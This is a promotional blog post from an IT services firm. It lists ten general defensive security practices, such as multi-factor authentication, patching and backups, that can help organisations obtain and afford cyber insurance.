As the frequency and scope of cyberattacks increases, so does the cost of cyber insurance.
Even worse, some companies are applying for coverage and being rejected because cyber insurance underwriters have concluded those companies are a bad risk because they don’t have enough mechanisms and programs in place to protect against attacks.
Corporate legal teams are playing a larger role than ever in their organisation’s cybersecurity programs. According to the Association of Corporate Counsel 2022 State of Cybersecurity Report, cybersecurity reports to the Chief Legal Officer (CLO) in 38 percent of departments surveyed and 84 percent of CLOs now have at least some cybersecurity-related responsibilities (up from 76 percent in 2020).
How can your organisation maximise its ability to obtain cyber insurance while keeping costs contained to the extent possible?
Here are ten steps to combat the high cost of cyber insurance:
1. Implement Multi-Factor Authentication (MFA):
Implementing MFA protection on every application that supports it can help protect confidential information, particularly concerning mission critical and valuable data systems by making stolen credentials useless without the authentication device.
2. Apply Principles of Least Privilege (POLP):
Upgrade your organisation’s security by tightly controlling access rights to its operating systems and applications. Create dedicated user accounts with limited privileges tailored for specific tasks, so that everything runs as smoothly – and safely! – as possible and ensure that your cloud providers do the same.
3. Apply Updates and Patches Promptly:
Keeping software and operating systems up-to-date with the latest security patches is an essential way to prevent potential threats, so it’s important to monitor when providers issue patches that eliminate vulnerabilities and apply them promptly (before the hackers, who monitor them as well, can take advantage of them).
4. Conduct Backup and Recovery Tests:
To ensure you’re prepared for the worst, establish regular backups and recovery tests of your key data. Doing so provides an invaluable control to limit disruptions caused by malicious activity like ransomware attacks.
5. Endpoint Detection and Response (EDR):
Keep your connected devices safe with an EDR security solution. This innovative technology actively collects data regarding connected systems, performs rules-based analysis to detect malicious activity, then generates automated responses designed to protect against cyber threats.
6. Email Security Filters:
Keeping your email spam and malware filters up-to-date is an effective way to protect against phishing attempts, significantly reducing risk.
7. Implement a Mobile Device Management (MDM) Solution:
Implementing MDM solutions can be a vital way to help keep mobile devices secure. Especially in the context of a BYOD environment where personal and business data are mixed on one device, these solutions equip organisations with valuable protection against potential risks.
8. Data Minimization, Encryption and Monitoring:
Maintaining data privacy is essential in our cyber-driven world. Data must be classified, managed and secured to reduce data breach risk and support data minimization. Regularly eliminating redundant, obsolete or trivial (ROT) data not only helps remove potentially sensitive data from exposure to hackers, but also meets GDPR requirements for prompt disposal when personal info no longer serves its original purpose. Encrypting sensitive data at rest protects that data even if it’s accessed by internal or external threats and monitoring activity on that sensitive data enables your organisation to react quickly to shut down threats before they can do any damage.
9. Keep Policies and Procedures Documentation Evergreen:
Keeping technology-related policies and procedures, such as credentials and password requirements, evergreen helps ensure the safety of your company’s data. Implementing security best practices is essential to protect against potential cyber threats.
10. Rigorous and Recurring Cyber Training:
To ensure all employees are up-to-date on the latest security protocols, regular intervals of comprehensive training and refreshers should be provided. Additionally, spot training can be conducted to combat newly identified risks as they arise.
Cyber insurance is no different than any other insurance in that the cost of it depends on the risk associated with the coverage. The drastic increase in the risk of cyber incidents is the primary driver in the rise of the global cybersecurity insurance market, which is expected to grow from $9.29 billion in 2021 to $38.7 billion by 2030.
Just as auto insurance providers offer a discount for a safe driving record and home insurance providers offer a discount for the implementation of a home security system, cyber insurance providers are more likely to not only offer cyber insurance coverage when your organisation demonstrates a comprehensive cybersecurity program, but they will also be more likely to offer lower rates for that coverage. Applying the ten steps discussed above will maximize the ability for your organisation to keep its cyber insurance costs in check.
For more information contact ITConnexion Team for a consultation.